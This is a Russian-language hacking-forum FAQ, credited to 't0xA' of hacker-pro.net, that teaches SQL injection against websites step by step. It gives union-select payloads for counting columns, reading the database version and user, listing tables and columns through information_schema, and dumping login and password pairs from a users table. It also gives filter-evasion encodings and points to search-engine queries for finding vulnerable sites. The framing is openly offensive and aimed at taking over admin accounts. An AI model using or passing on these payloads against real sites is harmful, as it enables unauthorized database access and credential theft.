В последнее время зачастились вопросы ко мне в ICQ - как провести SQL - Injection. Какие команды, почему неполучается... И я решил сделать FAQ... который будет дополнятся постоянно...
1. Q. КАК НАЙТИ SQL INJECTION
A. В конце параметра ID или PID поставить одинарную кавычку... Увидите ошибку типо
Код
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ''.
/Program_Areas/project.asp, line 146
или
Код
[Microsoft][ODBC Microsoft Access Driver]
или
Код
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.lionheart/ecodelaware/ecodelaware.com/place.php on line 107
Это скорее всего SQL - injecton зависит от СУБД...
2. Q. Как определить количество таблиц???
A. Для этого после цифры которая следует после ID ввести команду
Если вылазиет ошибка таблиц меньше 10 если все нормально то больше... Увеличивать по 1 до появления ошибки... Это и будет точное кол во таблиц...
3. Q. Я нашол точное количество таблиц и ХЗ чеделать дальше...
А. Дальше выводим рабочую цифру (тоблицу), предположем таблиц 5, делаем запрос
Код
+union+select+1,2,3,4,5/*
мы увидим цыфру с которой будем работать...
4. Q. Как определить версию СУБД?
А. Команда
Код
version(),database(),user()
5. Q.У меня mysql 4 версии немогу вывести названия таблиц???
A. Ты их и невывидиш потомучто функция information_schema.tables отключенна...
Перебирай в слепую...
6. Q. А как посмотреть название всех таблиц???
А. В 5 ветки командой
Код
information_schema.tables
пример +union+select+1,table_name,3,4,5+from+information_schema.tables/*
7. Q. А как узнать названия столбцов???
А. Так же как и таблиц заменяем на Column_name и information_schema.columns
8. Q. Я узнал таблицу USERS и столбцы login и password как мне вывести результат???
A. Командой
Код
union+select+1,concat(login,0x3a,password),3,4,5--
9. Q. Я узнал пароль и имя администратора, а где админка???
A. Ебу я чтоли где админки, я сайт делал чтоли!!!
10. Q. А где можно посмотреть видеомануалы по этой теме???
А. Вот ТУТ
11. Q. Я узнал количество таблиц на когда ввожу UNION+SELECT ничего непроисходит или вылазиет ошибка..??
А. Это потому что это функция отключенна - это blind SQL - injection
12. Q. А как мне отыскать SQL СУБД при помощи google??
А ТАКИЕ ЗАПРОСЫ
- в основном mySQL ,
- mssql
13. Q. А как мне обойти фильтрацию переменных???
А. В конце вместо ' можно ставить ",`,%27,%2527
Вместо /* можно --,{,%23
Вместо + можно /**/,%09,%0a,%0d,%2b
14. Q. Почему при команде group_concat не все таблицы или столбцы выводятся на экран??
А. Потомучто скорее всего стоит ограничение на вывод символов, перебираем через +Limit+1,1
15. Q. Чем отличается mssql от mysql?
А. MSSQL вертится на винде, а mySQL на чем угодно...
__________________
Автор: t0xA hacker-pro.net
Оригинальные образы
вверх
